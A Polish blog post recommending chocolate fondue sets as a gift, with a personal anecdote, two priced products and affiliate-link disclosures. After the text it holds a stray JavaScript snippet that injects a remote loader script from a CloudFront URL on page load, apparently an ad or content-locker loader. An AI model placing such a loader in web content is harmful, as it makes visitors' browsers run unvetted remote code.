Prezentuję zestaw dla łakomczuchów

12 czerwca 2012
Słodkie, słodsze i najsłodsze

Czy mówiłam Wam już, że uwielbiam truskawki? Chyba nie i wiem, że to pozornie informacja bez związku z tematyką tego bloga, ale właśnie wieczorne pałaszowanie truskawek z lodami z Panem M. przypomniało mi o pewnym prezencie, który dostałam bardzo dawno temu, ale do dziś darzę wielkim sentymentem, a którego jeszcze nie opisywałam. Najwyższa zatem pora nadrobić to zaniedbanie i przedstawić Wam zestaw dla łakomczuchów.

Jako znana wielbicielka słodyczy, a czekolady w szczególności, dostałam kiedyś w prezencie cudowne urządzenie, które pozwala delektować się tą słodyczą w formie płynnej i jeszcze w dodatku łączyć ją z różnymi owocami. Czy wiecie już jaki zestaw mam na myśli?

Zestaw do fondue w wydaniu klasycznym obejmuje garnek, w którym roztapia się ser (wraz z jakimś rodzajem podgrzewacza) oraz widelczyki, na które nadziewa się kawałki chleba do maczania w tym garnku. Wersja dla łasuchów i wielbicieli słodkości czyli fondue czekoladowe to mniejszy garnuszek i mniejsze widelczyki, ale za to więcej radości, bo można roztopić sobie czekoladę, a w niej zanurzać truskawki, banany, kiwi… (oj rozmarzyłam się)

Zestaw do czekoladowego fondue Cilio 15,5 cm – cena: 79,90 zł (www.czerwonamaszyna.pl)

Fondue czekoladowe MSC Simply – cena: 69,90 zł (www.czerwonamaszyna.pl)

  

Dawno temu, zestaw do takiego czekoladowego fondue podarowali mi moi ówcześni współlokatorzy i do dziś pamiętam pierwsze jego użycie – siedzieliśmy sobie z Panem M. na kocyku i karmiliśmy się nawzajem owocami maczanymi w pysznej czekoladzie. Czyż nie brzmi to jak definicja raju?

P.S. Zdjęcia pochodzą ze strony www.czerwonamaszyna.pl

Zawarte w tym wpisie linki do sklepu Czerwona Maszyna to tak zwane linki afiliacyjne. Oznacza to, iż jeśli klikając na nie dokonacie zakupu otrzymam z tego tytułu prowizję. Nie zmieni to w żaden sposób ceny jaką Wy zapłacicie za zamówione produkty, a pokaże mi, że doceniacie moje rekomendacje. Będę Wam bardzo wdzięczna za korzystanie z tych linków.

if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi:

Kategoria: , , , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję manifest nowoczesnych kobiet

Następny

Prezentuję tydzień prezentów dla naszych Ojców

Comments are closed here.